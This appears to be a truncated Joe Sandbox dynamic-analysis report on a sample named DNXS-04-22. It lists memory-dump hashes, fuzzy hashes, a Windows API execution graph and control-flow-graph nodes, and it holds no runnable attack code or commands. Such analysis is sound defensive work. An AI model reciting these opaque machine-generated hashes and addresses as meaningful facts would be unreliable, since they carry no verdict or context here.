                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5d60345338b49ff62aea3b221d124c3a03467c537b34cdd81d41679e16505a06
                                                                • Instruction ID: c381cd0db436b3848b008cfb192f4101317620c6af203ecd7f0ff5d06ba09e41
                                                                • Opcode Fuzzy Hash: 5d60345338b49ff62aea3b221d124c3a03467c537b34cdd81d41679e16505a06
                                                                • Instruction Fuzzy Hash: C8C08C2230012953C5042089E811A9B328EC784920F090027A20883B40CC828C0002DB
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c00e6e91351f28a3a49c81804004e223fbf1ae8663291428c59f45b449127de2
                                                                • Instruction ID: 5575e5d0c227afc4ff9c40dab901583a64a6268a840115e759b070a154a6be2c
                                                                • Opcode Fuzzy Hash: c00e6e91351f28a3a49c81804004e223fbf1ae8663291428c59f45b449127de2
                                                                • Instruction Fuzzy Hash: 5AB0922271423E53DA08319EA820AAF728ECB89E60F09016BE60D877858DC79C4102EE
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7bfc0481e660cae85692d226f400bcab12abd075592a6cab080ab98e2ea3f8f4
                                                                • Instruction ID: ec5668d915e4ba8fe3163d9df1e0e0934768796d0e274ed75cfe824493cf369c
                                                                • Opcode Fuzzy Hash: 7bfc0481e660cae85692d226f400bcab12abd075592a6cab080ab98e2ea3f8f4
                                                                • Instruction Fuzzy Hash: C5900252246182C2970215A88905D5F5A8904430D075C15C28492C8901D04D80868512
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 2:A,
                                                                • API String ID: 0-2300616151
                                                                • Opcode ID: 9350d119153595d0af4e1628d5e4b5e12ea6af4ecc68d2c9b15c4803dfb5d330
                                                                • Instruction ID: e8805238fa30c97370ae2542f9f3f894bc7ad74583b7e96a13d3bfb0382f6fa8
                                                                • Opcode Fuzzy Hash: 9350d119153595d0af4e1628d5e4b5e12ea6af4ecc68d2c9b15c4803dfb5d330
                                                                • Instruction Fuzzy Hash: B0E1FAB4E002598FDB24DFA9C5809EEFBB2FF89305F248169D414AB355D730A942CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b5ad47d834650e097d5a46a3dda207f4fd0b2b54ec9c66e3caac371888191290
                                                                • Instruction ID: 62df4525aaa7710c3dc80fa35db296385c922124d23ab614220f34ddec7cf531
                                                                • Opcode Fuzzy Hash: b5ad47d834650e097d5a46a3dda207f4fd0b2b54ec9c66e3caac371888191290
                                                                • Instruction Fuzzy Hash: 09E109B4E002598FDB14DFA9C580AEEFBB2FF89304F248169D454AB356D731A941CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1365170666.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5e50000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 43b30be0fdff67c2c0d62ab8a980fd8210d830c68c977f144ccf2ec30f4ff257
                                                                • Instruction ID: 3c779a4fb39bdeff5f9c5fa16417ab476045f2ee2677c932300a843ba513be78
                                                                • Opcode Fuzzy Hash: 43b30be0fdff67c2c0d62ab8a980fd8210d830c68c977f144ccf2ec30f4ff257
                                                                • Instruction Fuzzy Hash: 5D12C6B0C817458AE338CF25F84C9993BA1F7A5324BD25B09C2612B3E1E7B5196EDF44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 92d64444f7c3a14f90c9079a7c13ce0c84d6d3c61e64e88fdf7fbd4c1edb272c
                                                                • Instruction ID: dcb95d89037864d36a3213b5022f2c8122bc9e7f0168ae240df50dd2b121713b
                                                                • Opcode Fuzzy Hash: 92d64444f7c3a14f90c9079a7c13ce0c84d6d3c61e64e88fdf7fbd4c1edb272c
                                                                • Instruction Fuzzy Hash: 97E118B4E002598FDB24DFA9C580AEEFBB2FF89304F248169D414AB355D730A942CF61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2051443eb89c9d25aa768b6711105f3f6993eadc7f1f96d5567e6e07db661039
                                                                • Instruction ID: 24e698ad861e142e196918ef4473d7202762070157a7ab52d387640e9c6dfe38
                                                                • Opcode Fuzzy Hash: 2051443eb89c9d25aa768b6711105f3f6993eadc7f1f96d5567e6e07db661039
                                                                • Instruction Fuzzy Hash: 94E129B4E002598FDB24DFA9C580AEEFBB2FF89305F248169D414AB355D731A941CF61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a62abf6fd43c794c67b1015aa6fc7347e4bb5f7652c15f6911b5ff032589e95c
                                                                • Instruction ID: befcf32660f558b17115f409474374a4abdb21609f032ebc05ab3e7ecb187dd7
                                                                • Opcode Fuzzy Hash: a62abf6fd43c794c67b1015aa6fc7347e4bb5f7652c15f6911b5ff032589e95c
                                                                • Instruction Fuzzy Hash: 09E11AB4E002598FDB24DFA9C590AEEFBB2FF89305F248169D414AB355D730A942CF61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d2a37bd0ebed240a6aa47b17df556c8f61959bc7f372748af958461a4b4d76a4
                                                                • Instruction ID: 9a441125175ecab47bf6a9c70b7cc81776df82ef583342cff83624dae4dd6e5f
                                                                • Opcode Fuzzy Hash: d2a37bd0ebed240a6aa47b17df556c8f61959bc7f372748af958461a4b4d76a4
                                                                • Instruction Fuzzy Hash: 8BD1043592076A8ACB01EF64D8506DAB7B1FF95300F24D79AE4097B215FB706AC4CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1359349038.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2c50000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aba9c145570d47532c51521c7a2028464e9843758a3dd7405c29e8bd424ee1c9
                                                                • Instruction ID: c02501c7c5c0c64a3b9b3c73252f85bc119d21f25657847b38e031dc02204869
                                                                • Opcode Fuzzy Hash: aba9c145570d47532c51521c7a2028464e9843758a3dd7405c29e8bd424ee1c9
                                                                • Instruction Fuzzy Hash: 08A17E32E003258FCF19DFB5C8445AEB7B2FF85304B15856AE806AB265DB71E995CF80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fb3b229536797b8ad9a0f96c26493586b94ef9deb0044d8f485c667ff2e328f5
                                                                • Instruction ID: 218287dcf51b0c38bc7239da689035f5ca9ce5de4a7bf81e31f62e8758f52979
                                                                • Opcode Fuzzy Hash: fb3b229536797b8ad9a0f96c26493586b94ef9deb0044d8f485c667ff2e328f5
                                                                • Instruction Fuzzy Hash: 7BD1E33592076A8ACB01EF64D850ADAB7B1FF95300F24D79AE4097B215FB706AC4CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1365170666.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5e50000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6c56515867108f9634433fe26c518f77e2f87074fd34174b6bfee59f1de45607
                                                                • Instruction ID: 9501777cc05fe0e7bbd33f9e35c659f1bb75a81391722b0b698872e8043ffb5d
                                                                • Opcode Fuzzy Hash: 6c56515867108f9634433fe26c518f77e2f87074fd34174b6bfee59f1de45607
                                                                • Instruction Fuzzy Hash: 64C139B0C817458BD728CF25F8489993BB1FBA5324F925B09D1616B3E1EBB4186EDF40
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1368179797.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7fd0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 422838ee95fbf9b73fa1a8eead355da04e5f74521b6e5e8d97dcfda6fa643ce1
                                                                • Instruction ID: fac6b7054798140d8f024774787637f9c53855b3ae1550d013ee35808d268173
                                                                • Opcode Fuzzy Hash: 422838ee95fbf9b73fa1a8eead355da04e5f74521b6e5e8d97dcfda6fa643ce1
                                                                • Instruction Fuzzy Hash: 40611BB4A002198FDB09EFBBE85169EBBF3BBD4240F14C229D404AB369EB7458058B55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1368179797.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7fd0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2aabe1e8fb18ce26c09f2a90e407ade61227ea7ea38956e240a91615b61b4625
                                                                • Instruction ID: 2c3937f4946aab9e7a2a7d379d065bc409f149042e88859b38cb737b48bed8dd
                                                                • Opcode Fuzzy Hash: 2aabe1e8fb18ce26c09f2a90e407ade61227ea7ea38956e240a91615b61b4625
                                                                • Instruction Fuzzy Hash: CE611BB4A002198FDB09EFBBE85169EBBF3BBD4240F14C229D404AB369EB7458058B55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 05277715b259d0a9874c9e5d5557a7dfc9d82bf159e057d18fb4410f935cd630
                                                                • Instruction ID: b0cf07e8d1b97231f3d0d46fa6a0f3e734e17d3018e2dacca000bce5ac9d4fe6
                                                                • Opcode Fuzzy Hash: 05277715b259d0a9874c9e5d5557a7dfc9d82bf159e057d18fb4410f935cd630
                                                                • Instruction Fuzzy Hash: FB51E9B4E042598FDB14CFA9C9815EEFBB2FF89304F24816AD418AB355D7319942CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1368179797.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7fd0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fe35f7f009ac0daad4baf316fdecbf352e7b66e559e7f730c72a8af7c14fed6f
                                                                • Instruction ID: 3df89e0cbd2fd0e7acf5746dd6fc5b4782e0bfb95a900cb02ea25690dca13364
                                                                • Opcode Fuzzy Hash: fe35f7f009ac0daad4baf316fdecbf352e7b66e559e7f730c72a8af7c14fed6f
                                                                • Instruction Fuzzy Hash: 075193B5D016188BEB68CF2AD95479DBAF3BFC8200F14C1EAC40DA7264DB754A95CF10
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Execution Graph

                                                                Execution Coverage:13.5%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:10.5%
                                                                Total number of Nodes:133
                                                                Total number of Limit Nodes:13
                                                                execution_graph 39342 125d044 39343 125d05c 39342->39343 39344 125d0b6 39343->39344 39347 f50541 39343->39347 39353 f50548 39343->39353 39348 f50548 39347->39348 39349 f505a7 39348->39349 39359 f506c1 39348->39359 39364 f5079c 39348->39364 39370 f506d0 39348->39370 39354 f50575 39353->39354 39355 f505a7 39354->39355 39356 f506c1 CallWindowProcW 39354->39356 39357 f506d0 CallWindowProcW 39354->39357 39358 f5079c CallWindowProcW 39354->39358 39355->39355 39356->39355 39357->39355 39358->39355 39361 f506e4 39359->39361 39360 f50770 39360->39349 39375 f50779 39361->39375 39379 f50788 39361->39379 39365 f5075a 39364->39365 39366 f507aa 39364->39366 39368 f50779 CallWindowProcW 39365->39368 39369 f50788 CallWindowProcW 39365->39369 39367 f50770 39367->39349 39368->39367 39369->39367 39371 f506e4 39370->39371 39373 f50779 CallWindowProcW 39371->39373 39374 f50788 CallWindowProcW 39371->39374 39372 f50770 39372->39349 39373->39372 39374->39372 39376 f50788 39375->39376 39377 f50799 39376->39377 39382 f51bd5 39376->39382 39377->39360 39380 f50799 39379->39380 39381 f51bd5 CallWindowProcW 39379->39381 39380->39360 39381->39380 39385 f51bf0 39382->39385 39386 f51c32 39385->39386 39388 f51bda 39385->39388 39387 f51c8a CallWindowProcW 39386->39387 39386->39388 39387->39388 39388->39377 39389 e2d400 39390 e2d414 39389->39390 39391 e2d439 39390->39391 39393 e2c148 39390->39393 39394 e2d5c0 LoadLibraryExW 39393->39394 39396 e2d639 39394->39396 39396->39391 39420 e24db0 DuplicateHandle 39421 e24e46 39420->39421 39422 e2f750 39423 e2f7b8 CreateWindowExW 39422->39423 39425 e2f874 39423->39425 39425->39425 39397 e24b68 39398 e24bae GetCurrentProcess 39397->39398 39400 e24c00 GetCurrentThread 39398->39400 39401 e24bf9 39398->39401 39402 e24c36 39400->39402 39403 e24c3d GetCurrentProcess 39400->39403 39401->39400 39402->39403 39406 e24c73 39403->39406 39404 e24c9b GetCurrentThreadId 39405 e24ccc 39404->39405 39406->39404 39426 e2d358 39427 e2d3a0 GetModuleHandleW 39426->39427 39428 e2d39a 39426->39428 39429 e2d3cd 39427->39429 39428->39427 39430 28cd3d0 39431 28cd3dc 39430->39431 39438 6771de0 39431->39438 39446 6771dd0 39431->39446 39432 28cd497 39454 d08a58 39432->39454 39461 d08a48 39432->39461 39433 28cd5b6 39440 6771e02 39438->39440 39439 67721e9 39439->39432 39440->39439 39468 6778d94 39440->39468 39472 67789b0 39440->39472 39441 6771ece 39441->39439 39476 677bb70 39441->39476 39483 677bd0b 39441->39483 39447 6771de0 39446->39447 39448 67721e9 39447->39448 39452 6778d94 LdrInitializeThunk 39447->39452 39453 67789b0 LdrInitializeThunk 39447->39453 39448->39432 39449 6771ece 39449->39448 39450 677bb70 4 API calls 39449->39450 39451 677bd0b 4 API calls 39449->39451 39450->39449 39451->39449 39452->39449 39453->39449 39458 d08a7a 39454->39458 39455 d08f09 39455->39433 39456 d08c2f KiUserExceptionDispatcher 39457 d08b8c 39456->39457 39457->39455 39457->39456 39458->39455 39459 6778d94 LdrInitializeThunk 39458->39459 39460 67789b0 LdrInitializeThunk 39458->39460 39459->39457 39460->39457 39465 d08a58 39461->39465 39462 d08f09 39462->39433 39463 d08c2f KiUserExceptionDispatcher 39464 d08b8c 39463->39464 39464->39462 39464->39463 39465->39462 39466 6778d94 LdrInitializeThunk 39465->39466 39467 67789b0 LdrInitializeThunk 39465->39467 39466->39464 39467->39464 39469 6778c4b 39468->39469 39470 6778ed1 LdrInitializeThunk 39469->39470 39471 6778ee9 39470->39471 39471->39441 39474 67789e1 39472->39474 39473 6778b41 39473->39441 39474->39473 39475 6778ed1 LdrInitializeThunk 39474->39475 39475->39473 39478 677bb97 39476->39478 39477 677bcb3 39477->39441 39478->39477 39490 677bf64 39478->39490 39494 677be18 39478->39494 39498 677be28 39478->39498 39502 677bfc4 39478->39502 39485 677bbcf 39483->39485 39484 677bcb3 39484->39441 39485->39484 39486 677bf64 LdrInitializeThunk 39485->39486 39487 677bfc4 LdrInitializeThunk 39485->39487 39488 677be28 LdrInitializeThunk 39485->39488 39489 677be18 LdrInitializeThunk 39485->39489 39486->39484 39487->39484 39488->39484 39489->39484 39491 677bf43 39490->39491 39492 677be79 LdrInitializeThunk 39491->39492 39493 677be86 39491->39493 39492->39493 39493->39477 39495 677be28 LdrInitializeThunk 39494->39495 39497 677be86 39495->39497 39497->39477 39499 677be50 LdrInitializeThunk 39498->39499 39501 677be86 39499->39501 39501->39477 39503 677bf43 39502->39503 39505 677be86 39502->39505 39504 677be79 LdrInitializeThunk 39503->39504 39503->39505 39504->39505 39505->39477 39407 f53db8 39408 f53de0 39407->39408 39411 f53e0c 39407->39411 39409 f53de9 39408->39409 39412 f532fc 39408->39412 39413 f53307 39412->39413 39414 f54103 39413->39414 39416 f53318 39413->39416 39414->39411 39417 f5331d OleInitialize 39416->39417 39419 f5419c 39417->39419 39419->39414

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1008 67789b0-67789df 1009 67789e6-6778a7c 1008->1009 1010 67789e1 1008->1010 1012 6778b1b-6778b21 1009->1012 1010->1009 1013 6778b27-6778b3f 1012->1013 1014 6778a81-6778a94 1012->1014 1015 6778b53-6778b66 1013->1015 1016 6778b41-6778b4e 1013->1016 1017 6778a96 1014->1017 1018 6778a9b-6778aec 1014->1018 1020 6778b6d-6778b89 1015->1020 1021 6778b68 1015->1021 1019 6778ee9-6778fe6 1016->1019 1017->1018 1035 6778aff-6778b11 1018->1035 1036 6778aee-6778afc 1018->1036 1026 6778fee-6778ff8 1019->1026 1027 6778fe8-6778fed 1019->1027 1024 6778b90-6778bb4 1020->1024 1025 6778b8b 1020->1025 1021->1020 1031 6778bb6 1024->1031 1032 6778bbb-6778bed 1024->1032 1025->1024 1027->1026 1031->1032 1040 6778bf4-6778c36 1032->1040 1041 6778bef 1032->1041 1037 6778b13 1035->1037 1038 6778b18 1035->1038 1036->1013 1037->1038 1038->1012 1043 6778c3d-6778c46 1040->1043 1044 6778c38 1040->1044 1041->1040 1045 6778e6e-6778e74 1043->1045 1044->1043 1046 6778c4b-6778c70 1045->1046 1047 6778e7a-6778e8d 1045->1047 1050 6778c77-6778cae 1046->1050 1051 6778c72 1046->1051 1048 6778e94-6778eaf 1047->1048 1049 6778e8f 1047->1049 1052 6778eb6-6778eca 1048->1052 1053 6778eb1 1048->1053 1049->1048 1059 6778cb5-6778ce7 1050->1059 1060 6778cb0 1050->1060 1051->1050 1056 6778ed1-6778ee7 LdrInitializeThunk 1052->1056 1057 6778ecc 1052->1057 1053->1052 1056->1019 1057->1056 1062 6778d4b-6778d5e 1059->1062 1063 6778ce9-6778d0e 1059->1063 1060->1059 1064 6778d65-6778d8a 1062->1064 1065 6778d60 1062->1065 1066 6778d15-6778d43 1063->1066 1067 6778d10 1063->1067 1070 6778d8c-6778d8d 1064->1070 1071 6778d99-6778dd1 1064->1071 1065->1064 1066->1062 1067->1066 1070->1047 1072 6778dd3 1071->1072 1073 6778dd8-6778e39 call 6778790 1071->1073 1072->1073 1079 6778e40-6778e64 1073->1079 1080 6778e3b 1073->1080 1083 6778e66 1079->1083 1084 6778e6b 1079->1084 1080->1079 1083->1084 1084->1045
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9096f7fcab65ac095b3a1589f11b1dd1320301f41463da3f7d217cead08e5c26
                                                                • Instruction ID: 34c8493bf847a2999b009cd2b6e4b320d7190167402128fbe0543b2c5cbf0f22
                                                                • Opcode Fuzzy Hash: 9096f7fcab65ac095b3a1589f11b1dd1320301f41463da3f7d217cead08e5c26
                                                                • Instruction Fuzzy Hash: 4BF1D474E00218CFDB64DFA9C884B9DFBB2BF88304F1481A9E408AB355DB759986CF51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1085 d08a58-d08a78 1086 d08a7a 1085->1086 1087 d08a7f-d08b41 1085->1087 1086->1087 1092 d08b47-d08b64 1087->1092 1093 d08f0a-d09008 1087->1093 1143 d08b67 call 6772586 1092->1143 1144 d08b67 call 6772240 1092->1144 1095 d09010-d09016 1093->1095 1096 d0900a-d0900f 1093->1096 1096->1095 1099 d08b6c-d08b85 1147 d08b87 call 6778d94 1099->1147 1148 d08b87 call 67789b0 1099->1148 1100 d08b8c-d08bae 1102 d08bb0 1100->1102 1103 d08bb5-d08bbe 1100->1103 1102->1103 1104 d08efd-d08f03 1103->1104 1105 d08bc3-d08c5b KiUserExceptionDispatcher 1104->1105 1106 d08f09 1104->1106 1110 d08c61-d08c9d 1105->1110 1111 d08d33-d08d94 1105->1111 1106->1093 1145 d08ca3 call d09311 1110->1145 1146 d08ca3 call d090a1 1110->1146 1120 d08d95-d08dea 1111->1120 1118 d08ca9-d08ce4 1121 d08ce6-d08d03 1118->1121 1122 d08d2e-d08d31 1118->1122 1127 d08df0-d08ee0 1120->1127 1128 d08ee1-d08ef3 1120->1128 1125 d08d09-d08d2d 1121->1125 1122->1120 1125->1122 1127->1128 1130 d08ef5 1128->1130 1131 d08efa 1128->1131 1130->1131 1131->1104 1143->1099 1144->1099 1145->1118 1146->1118 1147->1100 1148->1100
                                                                APIs
                                                                • KiUserExceptionDispatcher.NTDLL ref: 00D08C48
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3785339684.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_d00000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: DispatcherExceptionUser
                                                                • String ID:
                                                                • API String ID: 6842923-0
                                                                • Opcode ID: 27be33f1b6319bd79a3f82915206c207fadad74bc540ee4c1c90f9b40d42aecb
                                                                • Instruction ID: 14e26db33791655f03dacbbf8e429c35a08ddc12095308d8020566d8a4f5b1e0
                                                                • Opcode Fuzzy Hash: 27be33f1b6319bd79a3f82915206c207fadad74bc540ee4c1c90f9b40d42aecb
                                                                • Instruction Fuzzy Hash: 8AE1C274E00218CFEB54DFA9C894B9DBBB2BF89300F2081AAD409A7395DB355E85DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1238 677be28-677be4e 1239 677be55-677be7f LdrInitializeThunk 1238->1239 1240 677be50 1238->1240 1242 677be86-677bea6 1239->1242 1240->1239 1243 677beba-677bed0 1242->1243 1244 677bea8-677beb5 1242->1244 1246 677bed7-677bef1 1243->1246 1247 677bed2 1243->1247 1245 677bf3d-677c019 1244->1245 1253 677c021-677c02b 1245->1253 1254 677c01b-677c020 1245->1254 1249 677bef3-677bf00 1246->1249 1250 677bf02-677bf18 1246->1250 1247->1246 1249->1245 1251 677bf1f-677bf2c 1250->1251 1252 677bf1a 1250->1252 1255 677bf33-677bf3b 1251->1255 1256 677bf2e 1251->1256 1252->1251 1254->1253 1255->1245 1256->1255
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 9b2542eb34374c185244060a4b75562e4239c9ed438c69bc9e24896614150a2b
                                                                • Instruction ID: bd152be5b594baf6856b9a7ab1f46988144b7333b6030e5a05c1cfc94eabc7f0
                                                                • Opcode Fuzzy Hash: 9b2542eb34374c185244060a4b75562e4239c9ed438c69bc9e24896614150a2b
                                                                • Instruction Fuzzy Hash: FD4107B4E002089FDB14CF99D584ADDFBB6FF88314F248169E408AB395D771A986CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1eae524ad9911154aae4191c322a38d081e7db6fbdcbcdc5681dbc3bd1d27f7f
                                                                • Instruction ID: 3ed10b7eefcba953aae74f12dda650ac62fc547c0dc4ba0bb8eaba5034499600
                                                                • Opcode Fuzzy Hash: 1eae524ad9911154aae4191c322a38d081e7db6fbdcbcdc5681dbc3bd1d27f7f
                                                                • Instruction Fuzzy Hash: 19728E7CA00219CFCB19CFA8C884AAEBBF2FF89314F258559E405DB2A5D731E951CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 13e5ec75e9ccf5a9b2bef272e748a5cd475e52f322ee03e1f6342815d23126e8
                                                                • Instruction ID: 1890c548fe90a74ad812f29acda9d1b9cd1ef343fecdbc5dcd4529910ed622dc
                                                                • Opcode Fuzzy Hash: 13e5ec75e9ccf5a9b2bef272e748a5cd475e52f322ee03e1f6342815d23126e8
                                                                • Instruction Fuzzy Hash: 70728CB4E012298FDB64DF69C984BEDBBB2BB49300F1481E9D449A7355DB349E81CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
